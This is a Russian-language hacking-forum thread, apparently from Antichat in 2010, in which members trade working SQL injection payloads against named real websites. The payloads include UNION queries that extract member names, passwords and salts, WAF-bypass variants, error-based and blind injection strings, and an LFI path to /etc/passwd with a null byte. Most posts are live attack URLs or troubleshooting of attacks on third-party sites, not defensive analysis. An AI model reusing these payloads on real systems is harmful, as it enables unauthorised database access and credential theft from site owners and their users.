07.01.2010, 15:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
Сообщение от Nightmarе
А что делать когда на сервере стоит WAFF, но ни один способ описанный в "Web_Application_Firewall.ppt" не пашет?
Пример:
Код:
http://www.webdevsforum.com/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)+union+select+null,null,null,5,concat_ws(0x3a,name,password,pass_salt),null,null,null,null+from+novaboard_members+where+id=1+--+
Так выглядит боевой запрос, который точно должен сработать, но из за WAFF`a не пахает. И ничё нельзя сделать, а если правильнее, то я ничего не смог сделать.
И так по всюду, а точнее на куче сайтов, учитывая то, что с методами обхода WAFF я как бы ознакомился немножко...
Хотя что то мне подсказывает, что помимо него ещё и существует .htaccess со своими регулярными выражениями... значит плохо смотрел )
http://www.webdevsforum.com/index.php?page=search&topic=1&pf=1&search=xek&auth or_id=1&forums[]=1)/*!union*/select+1,2,3,4,concat_ws(0x3a,name,password,pass_s alt),6,7,8,9+from+forum_members--+1
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
07.01.2010, 15:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
2 Nightmarе
или так
Код:
http://www.webdevsforum.com/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)union(select+1,2,3,4,concat_ws(0x3a,name,password,pass_salt),6,7,8,9+from+forum_members+where+id=1)+--+
|
|
|
|
08.01.2010, 03:05
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от warlok
всмысле ограничивает ? если ты про "common.inc.php"); то нет, ее можно отрезать или нул байтом или кучей слешей.
а от lfi типа ../etc/passwd%00
|
|
|
|
08.01.2010, 22:37
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от 547
скуль инжекция...
ввожу в админке:
login:"
pass:'
выдает вот такую ошибку:
Unclosed quotation mark after the character string '') AND (admin_user.public_in = 1)'.
Incorrect syntax near '') AND (admin_user.public_in = 1)
так же пробовал вариацию типо:
login:%00'
password:something 
Incorrect syntax near 'something'. Unclosed quotation mark after the character string ') AND (admin_user.public_in = 1)'.
как в таком случае провести инжекцию?
Как вариант попробуй найти скулю на сайте..
|
|
|
|
10.01.2010, 00:07
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
Сообщение от v1d0qz
Немогу понять, почему так пишет что перебор с колонками..
http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=111+or(1 ,1)=(select+count(*),concat(version(),floor(rand(0 )*2))from(information_schema.tables)GROUP+BY+2)#
а так всё ок.
http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=111+or(1 ,1)=(select*from(select+name_con st(version(),1),name_const(version(),1))e)
Код:
http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=1111+or+(select+count(*)+from+w3t_Posts+group+by+concat(version(),floor(rand(0)*2)))+--+
|
|
|
|
16.01.2010, 00:32
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от v1d0qz
Открывается общая категория, потому что редирект. А syntax это уже не фильтруется переменная. Нужно смотреть по ситуации, телепатов тут нет.
Oo никто тебя телепатом не назвал ))
Я прекрасно знаю где редирект где нет. Если нету дельных советов не путай. Просто вопрос было в том как обойти если ругается на одинарную кавычку добавив )
|
|
|
|
21.01.2010, 23:39
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от v1d0qz
Причин может быть много. Скинь ссылку в пм, если так не хочешь ей светить, а я уже потом скину в общак ответ со скрытой ссылкой.
уже отправил в личико.
Что получается я зря палил линк ((
|
|
|
|
22.01.2010, 00:52
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами:
9898501
Репутация:
257
|
|
Сообщение от YuNi|[c
уже отправил в личико.
Что получается я зря палил линк ((
Почему же?))
Сайт конечно не кислый с таким количеством тиц и таким возрастом домена
По теме. Щас уезжаю, потому доковырять не успею. Пока успел вывести только правильный запрос.
?script=%2527/**/and/**/1=1#
ну или так если с выводом..
?script=%2527/**/and/**/1=%25271
Потом, дубли организовать пока не удалось, выбивает 'Error Column 'table_name' in field list is ambiguous in', возможно из за того что до этого стоит ещё 2 или 3 join, а возможно и фикс, что за ошибка разберусь когда прийду, потому как раньше у меня такой ещё небыло. Далее.., запятая косит запрос, потому потому это ещё усложняет дело.
зы. Так как это LIKE, то обрывать нужно через #, а пробелы как вы наверное заметили я заменил на /**/
зы2. Через post всё аналогично.
Последний раз редактировалось v1d0qz; 22.01.2010 в 21:03..
|
|
|
|
22.01.2010, 13:59
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от v1d0qz
Почему же?))
Сайт конечно не кислый с таким количеством тиц и таким возрастом домена
По теме. Щас уезжаю, потому доковырять не успею. Пока успел вывести только правильный запрос.
?script=%2527/**/and/**/1=1#
ну или так если с выводом..
?script=%2527/**/and/**/1=%25271
Потом, дубли организовать пока не удалось, выбивает 'Error Column 'table_name' in field list is ambiguous in', возможно из за того что до этого стоит ещё 2 или 3 join, а возможно и фикс, что за ошибка разберусь когда прийду, потому как раньше у меня такой ещё небыло. Далее.., там запятая косит запрос, потому блинд огранизовать пока не удалось. Если реально как-то сделать без запятых, я внимательно слушаю
зы. Так как это LIKE, то обрывать нужно через #, а пробелы как вы наверное заметили я заменил на /**/
зы2. Через post всё аналогично. ну спс буду поковырят, если что составиш правильный запрос жду резултатов.
Вот тока не пойму как можно выводит sql запросы на браузер, тоесть что отправлю через гет пост и на какой запрос превращается
|
|
|
|
23.01.2010, 01:08
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от v1d0qz
Продолжение поста.
Вообщем досмотрел я запрос, Яника, если не ошибаюсь. Там головняк ещё тот. Вообщем сложно, долго, но реально.
Как оказалось, я не увидел что там стояло 2 дужки. Ну и собственно что получилось..
?script=%2527%29%29/**/and/**/substring%28version%28%29/**/from/**/version%28%29/**/for/**/1%29=3/*
Дальше ковырять не стал, потому как в 3-й версии особо не повоюешь, т.е. у меня нету столько свободного времени. Вот так вот.
зы. а с дублями там вообще помоему фикс, если я не ошибаюсь.
упс тут вроде не третая версия:
?script=%2527))/**/and/**/(version()/**/like/**/%25275%%2527)/*
на 5версию норм обрабатывает. Тока я не понял как теперь составит правильный запрос что вытянут имена из information_schema.tables если это реально конечно
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1812903){kind=avatar}
Похожие темы
Комбинированный вид
